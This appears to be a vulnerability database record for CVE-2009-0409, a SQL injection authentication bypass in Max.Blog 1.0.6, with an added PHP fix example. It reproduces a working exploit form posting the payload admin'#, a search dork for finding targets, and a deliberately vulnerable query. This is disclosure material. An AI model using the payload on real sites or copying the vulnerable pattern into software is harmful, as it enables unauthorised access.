mzbservices Max.Blog SQL Injection Vulnerability

Vulnerability ID: 1117308
Vulnerability type: SQL injection
Published: 2009-01-28
Updated: 2009-02-10
CVE: CVE-2009-0409
CNNVD ID: CNNVD-200902-056
Platform: PHP
CVSS score: 6.8
|Vulnerability sources
https://www.exploit-db.com/exploits/7899
https://cxsecurity.com/issue/WLB-2009010077
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-056
|Vulnerability details
Max.Blog is an open-source blog publishing and management tool. offline_auth.php in Max.Blog 1.0.6 and earlier contains a SQL injection vulnerability. When magic_quotes_gpc is disabled, a remote attacker can execute arbitrary SQL commands via the username parameter.
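As an added example, not part of this record or of Max.Blog's own code (offline_auth.php is not reproduced here, so the "before" is a hypothetical reconstruction of the pattern the advisory describes): the username concatenated into the query text, which only magic_quotes_gpc happens to protect, beside a version that binds it through a mysqli prepared statement and verifies the password in PHP. Table and column names are assumed.

```php
<?php
// Added example, not Max.Blog's code. The "before" function is a hypothetical
// reconstruction of the advisory's description: the username goes straight
// into the SQL text, so it is only safe while magic_quotes_gpc is on.
// Table "users" and its columns are assumed names.

// BEFORE (hypothetical): with magic_quotes_gpc off, a username containing a
// single quote closes the literal and the rest of the WHERE clause can be
// commented out, so the password comparison never runs.
function offline_auth_vulnerable(mysqli $db, string $username, string $password): bool
{
    $sql = "SELECT id FROM users WHERE username = '" . $username .
           "' AND password = '" . md5($password) . "'";
    $res = $db->query($sql);
    return $res !== false && $res->num_rows === 1;
}

// AFTER: the username never becomes part of the SQL text. It is bound as a
// parameter, so quotes and comment markers are just characters in a string,
// and the password is verified in PHP against a stored hash.
function offline_auth_fixed(mysqli $db, string $username, string $password): bool
{
    $hash = null;
    $stmt = $db->prepare('SELECT password_hash FROM users WHERE username = ? LIMIT 1');
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $stmt->bind_result($hash);
    $found = $stmt->fetch();
    $stmt->close();
    // password_verify does a constant-time comparison and does not depend on
    // any request-escaping setting such as magic_quotes_gpc.
    return $found === true && password_verify($password, $hash);
}
```

Neither function depends on magic_quotes_gpc; the fixed one stays correct whether that setting is on, off, or (in current PHP) absent altogether.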
|Exploit (EXP)
###################             Salvatore "drosophila" Fresta
###################


Application:    Max.Blog
                http://www.mzbservices.com
Version:        Max.Blog <= 1.0.6
Bug:            * Offline Authentication Bypass
Exploitation:   Remote
Dork:           intext:"Powered by Max.Blog"
Date:           27 Jan 2009
Discovered by:  Salvatore "drosophila" Fresta
Author:         Salvatore "drosophila" Fresta
                e-mail: drosophilaxxx@gmail.com


############################################################################

- BUGS

Offline Authentication Bypass Exploit:

       Requisites: magic quotes = off

       File affected: offline_auth.php

       This bug allows a guest to bypass an offline authentication service
       using a SQL injection vulnerability.

############################################################################

- CODE

<html>
        <head>
                <title>
                        Salvatore "drosophila" Fresta - Max.Blog <= 1.0.6 Offline Authentication Bypass Exploit
                </title>
        </head>
        <body>
                <form action="http://www.site.com/path/offline_auth.php" method="POST">
                        <input type="text" name="username" value="admin'#" size="15">
                        <input type="hidden" name="password">
                        <input type="submit" value="Go!">
                </form>
        </body>
</html>

############################################################################

# milw0rm.com [2009-01-28]
|References

Source: BID
Name: 33493
Link: http://www.securityfocus.com/bid/33493

Source: BUGTRAQ
Name: 20090127 Max.Blog <= 1.0.6 (offline_auth.php) Offline Authentication Bypass
Link: http://www.securityfocus.com/archive/1/archive/1/500470/100/0/threaded

Source: MILW0RM
Name: 7899
Link: http://www.milw0rm.com/exploits/7899

Source: SECUNIA
Name: 33658
Link: http://secunia.com/advisories/33658

Source: OSVDB
Name: 51645
Link: http://osvdb.org/51645